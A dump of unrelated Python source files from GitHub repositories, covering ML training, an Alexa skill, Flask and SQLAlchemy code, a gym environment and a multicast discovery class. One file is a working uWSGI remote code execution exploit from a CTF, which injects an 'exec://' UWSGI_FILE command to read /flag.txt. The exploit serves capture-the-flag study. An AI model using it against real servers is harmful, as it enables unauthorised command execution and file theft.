)\n\n def forward(self, x):\n x = x + self.token_mlp(x)\n x = x + self.channel_mlp(x)\n return x\n \n\nclass MLPMixer(nn.Module):\n def __init__(self, image_size, channels, patch_size, dim, depth, token_dim, channel_dim):\n super(MLPMixer, self).__init__()\n assert image_size % patch_size == 0\n\n self.num_patches = (image_size // patch_size) **2\n\n self.patch_embedding = nn.Sequential(\n nn.Conv2d(channels, dim, patch_size, patch_size),\n Rearrange('b c h w -> b (h w) c'),\n )\n\n self.mixer_blocks = nn.ModuleList([])\n for _ in range(depth):\n self.mixer_blocks.append(MLPMixerBlock(dim, self.num_patches, token_dim, channel_dim))\n \n self.ln = nn.LayerNorm(dim)\n\n self.fc = nn.Linear(dim, 10)\n \n def forward(self, x):\n x = self.patch_embedding(x)\n\n for block in self.mixer_blocks:\n x = block(x)\n\n x = self.ln(x)\n x = x.mean(dim=1)\n x = F.log_softmax(self.fc(x), dim=1)\n return x\n\nmodel = MLPMixer(image_size=28, channels=1, patch_size=7, dim=32, depth=4, token_dim=64, channel_dim=128).to(device)\noptimizer = torch.optim.Adam(model.parameters(), lr=1e-3)\ncriterion = nn.CrossEntropyLoss()\n\ndef train(epoch, log_interval=200):\n # Set model to training mode\n model.train()\n \n # Loop over each batch from the training set\n for batch_idx, (data, target) in enumerate(train_loader):\n # Copy data to GPU if needed\n data = data.to(device)\n target = target.to(device)\n\n # Zero gradient buffers\n optimizer.zero_grad() \n \n # Pass data through the network\n output = model(data)\n\n # Calculate loss\n loss = criterion(output, target)\n\n # Backpropagate\n loss.backward() \n \n # Update weights\n optimizer.step() # w - alpha * dL / dw\n \n if batch_idx % log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.data.item()))\n \n\ndef validate(loss_vector, accuracy_vector):\n model.eval()\n val_loss, correct = 0, 0\n for data, target in validation_loader:\n data = data.to(device)\n target = target.to(device)\n output = model(data)\n val_loss += criterion(output, target).data.item()\n pred = output.data.max(1)[1] # get the index of the max log-probability\n correct += pred.eq(target.data).cpu().sum()\n\n val_loss /= len(validation_loader)\n loss_vector.append(val_loss)\n\n accuracy = 100. * correct.to(torch.float32) / len(validation_loader.dataset)\n accuracy_vector.append(accuracy)\n \n print('\\nValidation set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n val_loss, correct, len(validation_loader.dataset), accuracy))\n \nepochs = 10\n\nif __name__ == \"__main__\":\n print(model)\n\n lossv, accv = [], []\n for epoch in range(1, epochs + 1):\n train(epoch)\n validate(lossv, accv)","repo_name":"Stupid-wangnz/DeepingLearning","sub_path":"FFN/MLPMixer.py","file_name":"MLPMixer.py","file_ext":"py","file_size_in_byte":5193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5500661427","text":"# -*- coding: utf-8 -*-\n\n# This sample demonstrates handling intents from an Alexa skill using the Alexa Skills Kit SDK for Python.\n# Please visit https://alexa.design/cookbook for additional examples on implementing slots, dialog management,\n# session persistence, api calls, and more.\n# This sample is built using the handler classes approach in skill builder.\nimport logging\nimport gettext\n\nfrom ask_sdk_core.skill_builder import SkillBuilder\nfrom ask_sdk_core.dispatch_components import (\n AbstractRequestHandler, AbstractRequestInterceptor, AbstractExceptionHandler)\nimport ask_sdk_core.utils as ask_utils\nfrom ask_sdk_core.handler_input import HandlerInput\n\nfrom ask_sdk_model import Response\nfrom alexa import data\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\nclass LaunchRequestHandler(AbstractRequestHandler):\n \"\"\"Handler for Skill Launch.\"\"\"\n\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n\n return ask_utils.is_request_type(\"LaunchRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n _ = handler_input.attributes_manager.request_attributes[\"_\"]\n speak_output = _(data.WELCOME_MESSAGE)\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n\nclass HelloWorldIntentHandler(AbstractRequestHandler):\n \"\"\"Handler for Hello World Intent.\"\"\"\n\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_intent_name(\"HelloWorldIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n _ = handler_input.attributes_manager.request_attributes[\"_\"]\n speak_output = _(data.HELLO_MSG)\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n # .ask(\"add a reprompt if you want to keep the session open for the user to respond\")\n .response\n )\n\n\nclass HelpIntentHandler(AbstractRequestHandler):\n \"\"\"Handler for Help Intent.\"\"\"\n\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_intent_name(\"AMAZON.HelpIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n _ = handler_input.attributes_manager.request_attributes[\"_\"]\n speak_output = _(data.HELP_MSG)\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n\nclass CancelOrStopIntentHandler(AbstractRequestHandler):\n \"\"\"Single handler for Cancel and Stop Intent.\"\"\"\n\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return (ask_utils.is_intent_name(\"AMAZON.CancelIntent\")(handler_input) or\n ask_utils.is_intent_name(\"AMAZON.StopIntent\")(handler_input))\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n _ = handler_input.attributes_manager.request_attributes[\"_\"]\n speak_output = _(data.GOODBYE_MSG)\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .response\n )\n\nclass FallbackIntentHandler(AbstractRequestHandler):\n \"\"\"Single handler for Fallback Intent.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_intent_name(\"AMAZON.FallbackIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In FallbackIntentHandler\")\n speech = \"Hmm, I'm not sure. You can say Hello or Help. What would you like to do?\"\n reprompt = \"I didn't catch that. What can I help you with?\"\n\n return handler_input.response_builder.speak(speech).ask(reprompt).response\n\nclass SessionEndedRequestHandler(AbstractRequestHandler):\n \"\"\"Handler for Session End.\"\"\"\n\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_request_type(\"SessionEndedRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n\n # Any cleanup logic goes here.\n\n return handler_input.response_builder.response\n\n\nclass IntentReflectorHandler(AbstractRequestHandler):\n \"\"\"The intent reflector is used for interaction model testing and debugging.\n It will simply repeat the intent the user said. You can create custom handlers\n for your intents by defining them above, then also adding them to the request\n handler chain below.\n \"\"\"\n\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_request_type(\"IntentRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n _ = handler_input.attributes_manager.request_attributes[\"_\"]\n intent_name = ask_utils.get_intent_name(handler_input)\n speak_output = _(data.REFLECTOR_MSG).format(intent_name)\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n # .ask(\"add a reprompt if you want to keep the session open for the user to respond\")\n .response\n )\n\n\nclass CatchAllExceptionHandler(AbstractExceptionHandler):\n \"\"\"Generic error handling to capture any syntax or routing errors. If you receive an error\n stating the request handler chain is not found, you have not implemented a handler for\n the intent being invoked or included it in the skill builder below.\n \"\"\"\n\n def can_handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> bool\n return True\n\n def handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> Response\n logger.error(exception, exc_info=True)\n _ = handler_input.attributes_manager.request_attributes[\"_\"]\n speak_output = _(data.ERROR)\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n\nclass LocalizationInterceptor(AbstractRequestInterceptor):\n \"\"\"\n Add function to request attributes, that can load locale specific data\n \"\"\"\n\n def process(self, handler_input):\n locale = handler_input.request_envelope.request.locale\n i18n = gettext.translation(\n 'data', localedir='locales', languages=[locale], fallback=True)\n handler_input.attributes_manager.request_attributes[\"_\"] = i18n.gettext\n\n# The SkillBuilder object acts as the entry point for your skill, routing all request and response\n# payloads to the handlers above. Make sure any new handlers or interceptors you've\n# defined are included below. The order matters - they're processed top to bottom.\n\n\nsb = SkillBuilder()\n\nsb.add_request_handler(LaunchRequestHandler())\nsb.add_request_handler(HelloWorldIntentHandler())\nsb.add_request_handler(HelpIntentHandler())\nsb.add_request_handler(CancelOrStopIntentHandler())\nsb.add_request_handler(FallbackIntentHandler())\nsb.add_request_handler(SessionEndedRequestHandler())\n# make sure IntentReflectorHandler is last so it doesn't override your custom intent handlers\nsb.add_request_handler(IntentReflectorHandler())\n\nsb.add_global_request_interceptor(LocalizationInterceptor())\n\nsb.add_exception_handler(CatchAllExceptionHandler())\n\nhandler = sb.lambda_handler()\n","repo_name":"alexa-samples/skill-sample-python-helloworld-classes","sub_path":"lambda/py/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":7561,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"60"} +{"seq_id":"43034280009","text":"from aocd import get_data\n\nROCK = 1\nPAPER = 2\nSCISSOR = 3\n\nITEMS = {'A': ROCK, 'B': PAPER, 'C': SCISSOR, 'X': ROCK, 'Y': PAPER, 'Z': SCISSOR}\n\nWIN = 6\nDRAW = 3\nLOST = 0\n\nPLAY_VALUES = {\n 'AX': DRAW,\n 'BY': DRAW,\n 'CZ': DRAW,\n 'AY': WIN,\n 'BZ': WIN,\n 'CX': WIN\n}\n\ntotal_score = 0\nfor line in get_data(day=2, year=2022).splitlines():\n play = line.strip().split(' ')\n score = ITEMS[play[1]] + PLAY_VALUES.get(play[0]+play[1], 0)\n print(f\"{play} score: {score}\")\n total_score += score\n\nprint(total_score) \n","repo_name":"ztamas83/adventofcode","sub_path":"2022/2/rps.py","file_name":"rps.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6226880793","text":"import requests, json\r\n\r\ndef requisicao(titulo):\r\n try:\r\n req = requests.get('http://www.omdbapi.com/?t='+titulo+'&apikey=b7d5c054')\r\n dicionario = json.loads(req.text)\r\n return dicionario\r\n except Exception as err:\r\n print('Erro na conexão')\r\n return None\r\n\r\nsair = False\r\n\r\ndef printar_detalhes(filme):\r\n print('Título: ', filme['Title'])\r\n print('Diretor: ', filme['Director'])\r\n print('Atores: ', filme['Actors'])\r\n print('Ano: ', filme['Year'])\r\n print('Nota: ', filme['imdbRating'])\r\n\r\nwhile not sair:\r\n op = input('Escreva o nome de um filme ou SAIR para fechar: ')\r\n if op == 'SAIR':\r\n sair = True\r\n print('Saindo...')\r\n else:\r\n filme = requisicao(op)\r\n if filme['Response'] == 'False':\r\n print('Filme não encontrado!')\r\n else:\r\n printar_detalhes(filme)\r\n","repo_name":"NathanCarlos/cursopyhtonbasico","sub_path":"aula13 - API-lista-de-filmes.py","file_name":"aula13 - API-lista-de-filmes.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"3463282398","text":"import sqlalchemy\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\n\n# noinspection PyShadowingNames\nclass Database:\n def __init__(self, autocommit=True) -> None:\n self.base = declarative_base()\n self.engine = None\n self.session = scoped_session(sessionmaker())\n self.autocommit = autocommit\n\n def init(self, connection_url: str, echo=True, create_tables=True) -> None:\n self.engine = sqlalchemy.create_engine(connection_url, echo=echo)\n self.base.metadata.bind = self.engine\n self.session.configure(bind=self.engine)\n if create_tables:\n self.base.metadata.create_all(self.engine)\n\n def create_middleware(self) -> \"DatabaseMiddleware\":\n return DatabaseMiddleware(self)\n\n\nclass DatabaseMiddleware:\n def __init__(self, db: Database) -> None:\n self.db = db\n\n def process_response(self, req, resp, resource, req_succeeded: bool, **__) -> None:\n try:\n if self.db.autocommit:\n if req_succeeded:\n self.db.session.commit()\n else:\n self.db.session.rollback()\n finally:\n self.db.session.remove()\n","repo_name":"numberoverzero/scaffolding","sub_path":"scaffolding/middleware/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29148911419","text":"#!/usr/bin/python\n# coding: utf-8\n######################\n# Uwsgi RCE Exploit\n######################\n# Author: wofeiwo@80sec.com\n# Created: 2017-7-18\n# Last modified: 2018-1-30\n# Note: Just for research purpose\n\nimport sys\nimport socket\nimport argparse\nimport requests\n\ndef sz(x):\n s = hex(x if isinstance(x, int) else len(x))[2:].rjust(4, '0')\n if sys.version_info[0] == 3: pass\n s = bytes.fromhex(s) if sys.version_info[0] == 3 else s.decode('hex')\n return s[::-1]\n\n\ndef pack_uwsgi_vars(var):\n pk = b''\n for k, v in var.items() if hasattr(var, 'items') else var:\n pk += sz(k) + k.encode('utf8') + sz(v) + v.encode('utf8')\n result = b'\\x00' + sz(pk) + b'\\x00' + pk\n return result\n\n\ndef parse_addr(addr, default_port=None):\n port = default_port\n if isinstance(addr, str):\n if addr.isdigit():\n addr, port = '', addr\n elif ':' in addr:\n addr, _, port = addr.partition(':')\n elif isinstance(addr, (list, tuple, set)):\n addr, port = addr\n port = int(port) if port else port\n return (addr or '127.0.0.1', port)\n\n\ndef get_host_from_url(url):\n if '//' in url:\n url = url.split('//', 1)[1]\n host, _, url = url.partition('/')\n return (host, '/' + url)\n\n\ndef fetch_data(uri, payload=None, body=None):\n if 'http' not in uri:\n uri = 'http://' + uri\n s = requests.Session()\n # s.headers['UWSGI_FILE'] = payload\n if body:\n import urlparse\n body_d = dict(urlparse.parse_qsl(urlparse.urlsplit(body).path))\n d = s.post(uri, data=body_d)\n else:\n d = s.get(uri)\n\n return {\n 'code': d.status_code,\n 'text': d.text,\n 'header': d.headers\n }\n\n\ndef ask_uwsgi(var, body=''):\n return pack_uwsgi_vars(var) + body.encode('utf8')\n\n\ndef curl():\n target_url = 'http://localhost:18888/?qs'\n host, uri = get_host_from_url(target_url)\n path, _, qs = uri.partition('?')\n command = r'echo \"open(\\\"/tmp/notes/eyo-jinmo\\\", \\\"w\\\").write(repr(open(\\\"/flag.txt\\\").read()))\"'\n payload = 'exec://' + command\n var = {\n 'SERVER_PROTOCOL': 'HTTP/1.1',\n 'REQUEST_METHOD': 'GET',\n 'PATH_INFO': path,\n 'REQUEST_URI': uri,\n 'QUERY_STRING': qs,\n 'SERVER_NAME': host,\n 'HTTP_HOST': host,\n 'UWSGI_FILE': payload,\n 'SCRIPT_NAME': target_url\n }\n return ask_uwsgi(var, 'A' * 0x10000)\n\n\ndef main(*args):\n print(curl())\n\nif __name__ == '__main__':\n main()","repo_name":"Jinmo/ctfs","sub_path":"2020/pbctf/web/simple-note/uwsgi_exp.py","file_name":"uwsgi_exp.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"60"} +{"seq_id":"4163822961","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 13 02:47:58 2022\r\n\r\n@author: 86153\r\n\"\"\"\r\n\r\n\r\n############ Custom Environments #######################################\r\n\r\nfrom gym.spaces import Box, Discrete\r\nimport torch\r\nimport math\r\nfrom math import sqrt, pow\r\nimport numpy as np\r\nimport random\r\nimport gym\r\nfrom gym import spaces\r\nfrom gym.utils import seeding\r\nimport time\r\n\r\n\r\n\r\nclass Custom_Env(gym.Env):\r\n\r\n def __init__(self):\r\n \r\n # state limit\r\n self.min_position = -5000\r\n self.max_position = 5000\r\n\r\n\r\n self.low_state = np.array(\r\n [self.min_position, self.min_position], dtype=np.float32\r\n )\r\n \r\n self.high_state = np.array(\r\n [self.max_position, self.max_position], dtype=np.float32\r\n )\r\n \r\n self.observation_space = spaces.Box(\r\n low = self.low_state,\r\n high = self.high_state,\r\n dtype = np.float32\r\n ) \r\n self.action_space = Discrete(5)\r\n\r\n \r\n self.n_agent = 25\r\n self.n_s_ls, self.n_a_ls, self.coop_gamma, self.distance_mask, self.neighbor_mask \\\r\n = [], [], -1, np.zeros((self.n_agent, self.n_agent)), np.zeros((self.n_agent, self.n_agent))\r\n \r\n\r\n self.init_neighbor_mask() \r\n self.init_distance_mask() \r\n self.seed()\r\n\r\n\r\n def seed(self, seed=None):\r\n self.np_random, seed = seeding.np_random(seed)\r\n return [seed]\r\n\r\n def step(self, action):\r\n\r\n '''update state ''' \r\n\r\n return np.array(self.state), np.array(reward), np.array(done), np.array({})\r\n\r\n def get_state_(self):\r\n \r\n return State\r\n \r\n def reset(self):\r\n \r\n '''reset state'''\r\n \r\n return np.array(self.state)\r\n\r\n\r\n def init_neighbor_mask(self):\r\n n = self.n_agent\r\n for i in range(n):\r\n self.neighbor_mask[i][i] = 1\r\n self.neighbor_mask[i][(i+1)%n] = 1\r\n self.neighbor_mask[i][(i+n-1)%n] = 1\r\n\r\n def init_distance_mask(self):\r\n n = self.n_agent\r\n for i in range(n):\r\n for j in range(n):\r\n self.distance_mask[i][j] = min((i-j+n)%n, (j-i+n)%n)\r\n\r\n\r\n","repo_name":"PKU-MARL/Model-Based-MARL","sub_path":"algorithms/envs/Custom_Env.py","file_name":"Custom_Env.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"60"} +{"seq_id":"21920897625","text":"import sys\nimport numpy as np\n\nclass QGSM_Distributions:\n\n def __init__(self,energy):\n\n print(\"Reading files...\")\n path = \"../data/rawData/\"+str(energy)+\"/data/\"\n eventNr, nrParticles = np.loadtxt(path+\"B_MULT\",dtype=int,usecols=(0,2),unpack=True)\n NPOM = np.loadtxt(path+\"NPOM.dat\",dtype=int)\n finalpr = open(path+\"finalpr.data\",'r')\n \n self.path = path\n self.eventNr, self.nrParticles, self.finalpr, self.NPOM =\\\n eventNr, nrParticles, finalpr, NPOM\n\n def closeFile(self):\n self.finalpr.close()\n\n def collectData(self):\n\n eventNr, nrParticles, finalpr, NPOM =\\\n self.eventNr, self.nrParticles, self.finalpr, self.NPOM\n\n self.lineCount = 0\n total = len(eventNr)\n tol = 10e-9\n inElasticEvents = 0\n elasticEvents = 0\n startParticle = 0\n endParticle = 0\n\n ALL = []\n eventNr = eventNr[::]\n nrParticles = nrParticles[::]\n print(\"Collecting data...\")\n for event,nrParts in zip(eventNr,nrParticles):\n\n if nrParts == 2:\n elasticEvents += 1\n finalpr.readline()\n finalpr.readline()\n else:\n inElasticEvents += 1\n\n for count in range(nrParts):\n parton = finalpr.readline()\n #[startParticle : startParticle+nrParts]:\n\n parton = list(map(float,parton.strip().split()))\n\n E = parton[4]\n px = parton[5]\n py = parton[6]\n pz = parton[7]\n C = parton[13]\n\n if C != 0:\n p = np.sqrt(px**2 + py**2 + pz**2) \n pTransverse = np.sqrt(px**2 + py**2)\n if pTransverse > 0.3 and pTransverse < 1.5:\n if abs(E-pz)',\n methods=['GET', 'DELETE', 'PUT'],\n strict_slashes=False)\ndef get_amenity_id(amenity_id):\n '''Retrieves a Amenity object'''\n amenity_obj = storage.get(Amenity, amenity_id)\n if not amenity_obj:\n abort(404)\n\n if request.method == \"GET\":\n return jsonify(amenity_obj.to_dict())\n\n elif request.method == \"DELETE\":\n storage.delete(amenity_obj)\n storage.save()\n return jsonify({}), 200\n\n elif request.method == \"PUT\":\n if not request.is_json:\n abort(400, description=\"Not a JSON\")\n\n amenity_json = request.get_json()\n not_needed = [\"id\", \"created_at\", \"updated_at\"]\n for attr, attr_value in amenity_json.items():\n if attr not in not_needed:\n setattr(amenity_obj, attr, attr_value)\n amenity_obj.save()\n return jsonify(amenity_obj.to_dict()), 200\n","repo_name":"mukhtarB/AirBnB_clone_v4","sub_path":"api/v1/views/amenities.py","file_name":"amenities.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74262471872","text":"# from agency.business_logic.car_model import Car_Model\nfrom .booking import Booking\nfrom .fixed_booking import FixedBooking\nfrom ..models import BOOKING, FIXED_BOOKING\nfrom django.core.exceptions import ObjectDoesNotExist\n\nclass BookingList:\n def __init__(self):\n pass\n\n def add_booking(self,trip,allocated_car,allocated_hotel,customer):\n new_booking = Booking(trip,allocated_car,allocated_hotel,customer)\n new_booking.save()\n return new_booking\n \n def add_fixed_booking(self, trip, customer):\n new_booking = FixedBooking(trip, customer)\n new_booking.save()\n return new_booking\n \n def get_booking(self,booking_id):\n try:\n searched_booking = BOOKING.objects.get(id=booking_id)\n return searched_booking\n except ObjectDoesNotExist:\n raise Exception(f'{id} does not exist!')\n\n def get_fixed_booking(self,booking_id):\n try:\n searched_booking = FIXED_BOOKING.objects.get(id=booking_id)\n return searched_booking\n except ObjectDoesNotExist:\n raise Exception(f'{id} does not exist!')","repo_name":"affan-ansari/travel_management","sub_path":"agency/business_logic/booking_list.py","file_name":"booking_list.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"42732760599","text":"import socket\nimport signal\nimport pyuv\nimport json\nfrom time import *\n\ng_listenip = \"0.0.0.0\"\ng_multicast_port = 30001\n\nJsonType = 0\nProtoType = 1\ntopicType = 0\nserviceType = 1\n\n# json callback info\nclass JsnCallBack(object):\n def __init__(self):\n topicName = \"\"\n jsnSub = None # std::function \n jsnCb = None # std::function \n\nclass MsgCallBack(object):\n def __init__(self):\n topicName = \"\"\n MsgCb = None # std::function\n msgCb = None \n\nclass ServiceCall(object):\n def __init__(self):\n serviceName = \"\"\n servCall = \"\" # std::function &callback)>\n callback = None # std::function\n params = {} # json params\n\nclass Multicast(object):\n\n # multicast init\n def __init__(self,multicast_addr,localip):\n # get local socket name\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.connect((\"8.8.8.8\",80))\n self.__m_localip = sock.getsockname()[0]\n print(\"local ip \",self.__m_localip)\n\n # init recv_socket\n self.loop = pyuv.Loop.default_loop()\n self.__m_multicast_addr = multicast_addr\n self.__m_recv_socket = pyuv.UDP(self.loop)\n self.__m_recv_socket.bind((g_listenip,g_multicast_port),pyuv.UV_UDP_REUSEADDR)\n self.__m_recv_socket.set_membership(multicast_addr,pyuv.UV_JOIN_GROUP)\n self.__m_recv_socket.set_broadcast(True)\n self.__m_recv_socket.start_recv(self.handlerRecv) # recieve handler\n\n # init send_socket\n self.__m_send_socket = pyuv.UDP(self.loop)\n self.__m_send_socket.bind((g_listenip,g_multicast_port),pyuv.UV_UDP_REUSEADDR)\n # self.__m_send_socket.set_membership(multicast_addr,pyuv.UV_JOIN_GROUP)\n\n # \n self.__m_localEndpoint = \"\"\n self.__m_localrpcEndpoint = \"\"\n self.__m_jsnCbMap = {}\n self.__m_msgCbMap = {}\n self.__m_serviceCallMap = {}\n self.__m_topicMap = {} # std::unordered_map>\n self.__m_serviceMap = {} # std::unordered_map>\n\n self.__m_signal_h = pyuv.Signal(self.loop)\n self.__m_signal_h.start(self.signal_handler, signal.SIGINT)\n \n def get_localip(self):\n return self.__m_localip\n\n # if ctrl + c signal , then close socket\n def signal_handler(self,handle, signum):\n self.__m_signal_h.close()\n self.__m_recv_socket.close()\n self.__m_send_socket.close()\n\n def __del__( self ):\n # deconstruct function\n pass\n \n def setLocalEndpoint(self,pubsubEndpoing,rpcEndpoint):\n self.__m_localEndpoint = pubsubEndpoing\n self.__m_localrpcEndpoint = rpcEndpoint\n \n def dealDelayCallBack(self,topicName):\n jsoncall = __m_jsnCbMap[topicName]\n if(jsoncall != None):\n jsncb = jsoncall.jsncb\n jsoncall.jsnSub(topicName,jsncb) # call json sub\n del __m_jsnCbMap[topicName]\n \n # call msg sub for protobuf\n \n def dealServiceDelayCall(self,serviceName):\n service_call = self.__m_serviceCallMap[serviceName]\n if(service_call != None):\n params = service_call.params\n callback = service_call.callback\n service_call.servCall(serviceName,params,callback)\n del __m_serviceCallMap[serviceName]\n\n # update topic map or service map\n def updateMap(self,type,result):\n if(type == topicType):\n print(\"update topic map\")\n endpoints = __m_topicMap[result[\"topic\"]] #topic may has sevel server endpoints\n endpoint = result[\"endpoint\"]\n if(endpoints != None): # find topic and related endpoints list\n if(endpoint in endpoints): # alread has endpoint in list\n return\n else:\n __m_topicMap[result[\"topic\"]].append(endpoint)\n else: # not found then insert\n ends = []\n ends.append(endpoint)\n __m_topicMap[result[\"topic\"]] = ends\n \n # service type\n elif(type == serviceType): \n print(\"update service map\")\n endpoints = __m_serviceMap[result[\"service\"]]\n endpoint = result[\"endpoint\"]\n if(endpoints != None): # find topic and related endpoints list\n if(endpoint in endpoints): # alread has endpoint in list\n return\n else:\n __m_serviceMap[result[\"service\"]].append(endpoint)\n else: # not found then insert\n ends = []\n ends.append(endpoint)\n __m_serviceMap[result[\"service\"]] = ends\n\n def findLocalSupport(self,supportName,type):\n if(type == topicType):\n self.sendRspToPeer(self.__m_topicMap,supportName,self.__m_localEndpoint, \"topic\")\n elif(type == serviceType):\n self.sendRspToPeer(self.__m_serviceMap,supportName,self.__m_localrpcEndpoint, \"service\")\n\n # map : {service_name/topic_name,[endpoints]}\n def sendRspToPeer(self,map,supportName,endpoint,field):\n print(\"start to send response\")\n map.setdefault(supportName,None) # set default to prevent code collapse\n endpoints = map[supportName]\n if(endpoints != None):\n if endpoint in endpoints:\n json_dict = {\n \"method\" : \"response\",\n field : supportName,\n \"endpoint\" : endpoint\n }\n json_str = json.dumps(json_dict)\n json_bytes = bytes(json_str, encoding = \"utf8\")\n self.__m_recv_socket.send((self.__m_multicast_addr,g_multicast_port),json_bytes)\n\n def multicastTopic(self,topicName,endpoint):\n json_dict = {\n \"method\" : \"commonMulti\",\n \"topic\" : topicName,\n \"endpoint\" : endpoint\n }\n json_str = json.dumps(json_dict)\n json_bytes = bytes(json_str, encoding = \"utf8\")\n print(\"__m_multicast_addr is \",self.__m_multicast_addr)\n print(\"g_multicast_port is \",g_multicast_port)\n self.__m_send_socket.send((self.__m_multicast_addr,g_multicast_port),json_bytes)\n\n def sendRequest(self,supportName,filed):\n json_dict = {\n \"method\" : \"request\",\n filed : supportName,\n \"endpoint\" : \"\"\n }\n print(\"send request\")\n json_str = json.dumps(json_dict)\n json_bytes = bytes(json_str, encoding = \"utf8\")\n self.__m_send_socket.send((self.__m_multicast_addr,g_multicast_port),json_bytes)\n \n def multicastService(self,serviceName,endpoint):\n json_dict = {\n \"method\" : \"commonMulti\",\n \"endpoint\" : serviceName,\n \"endpoint\" : endpoint\n }\n print(\"send service endpoint\")\n json_str = json.dumps(json_dict)\n json_bytes = bytes(json_str, encoding = \"utf8\")\n self.__m_send_socket.send((self.__m_multicast_addr,g_multicast_port),json_bytes)\n \n # endpoints : endpoint list\n def findTopic(self,topicName,endpoints):\n res = True\n # print(\"finding topic name in local map: \" ,topicName)\n topic_endpoints = self.__m_topicMap.get(topicName)\n if(topic_endpoints == None): #can not find topic\n print(\"can not find topic name in local map\")\n res = False\n return res\n endpoints = topic_endpoints\n return res\n\n # endpoints : endpoint list\n def findService(self,serviceName,endpoints):\n res = True\n print(\"finding service name in local map: \" ,serviceName)\n service_endpoints = self.__m_serviceMap[serviceName]\n if(service_endpoints == None): #can not find topic\n res = False\n return res\n endpoints = service_endpoints\n return res\n\n # std::unordered_map\n # struct JsnCallBack{\n # std::string topicName;\n # std::function jsnSub;\n # JsnCb jsnCb;\n # ~JsnCallBack(){}\n # };\n # JsnCallBack\n def pushTopic_JsonCallBack(self,JsnCallBack):\n self.__m_jsnCbMap[JsnCallBack.topicName] = JsnCallBack\n \n def pushServiceCallBack(self,serviceCall):\n self.__m_serviceCallMap[serviceCall.serviceName] = serviceCall\n \n def run(self):\n self.loop.run() #run multicast service\n print(\"socket disconnect\")\n \n def handlerRecv(self,handle, ip_port, flags, data, error):\n print(\"get into handler Recv\")\n if(error is None):\n if(data is not None):\n json_str = str(data, encoding = \"utf-8\") \n result = json.loads(json_str)\n print(\"recieve json is : \",result)\n\n if(result[\"endpoint\"] is not None):\n method = result[\"method\"]\n # if recieve topic msg\n if(result[\"topic\"] is not None):\n if(method == \"commonMulti\"):\n self.updateMap(topicType,result)\n self.dealDelayCallBack(result[\"topic\"])\n elif(method == \"request\"):\n self.findLocalSupport(result[\"topic\"],topicType)\n elif (method == \"response\"):\n self.updateMap(topicType,result)\n self.dealDelayCallBack(result[\"topic\"])\n # deal service msg\n elif(result[\"service\"] is not None):\n if(method == \"commonMulti\"):\n self.updateMap(serviceType,result)\n self.dealServiceDelayCall(result[\"service\"])\n elif(method == \"request\"):\n self.findLocalSupport(result[\"service\"],serviceType)\n elif(method == \"response\"):\n self.updateMap(serviceType,result)\n self.dealServiceDelayCall(result[\"service\"])\n else:\n print(\"error is \",error)\n\ndef multicast_test(mult1):\n mult1.multicastService(\"add\",\"192.168.1.3\")\n mult1.multicastTopic(\"sub\",\"192.34.2.2\")\n mult1.sendRequest(\"topic_request\",\"topic\")\n mapset = {\"topic_response\" : [\"192\",\"168\"]}\n mult1.sendRspToPeer(mapset,\"topic_response\",\"192\",\"topic\")\n\nimport threading\n\nif __name__ == \"__main__\":\n mult1 = Multicast(\"239.255.0.1\",10001)\n thread1 = 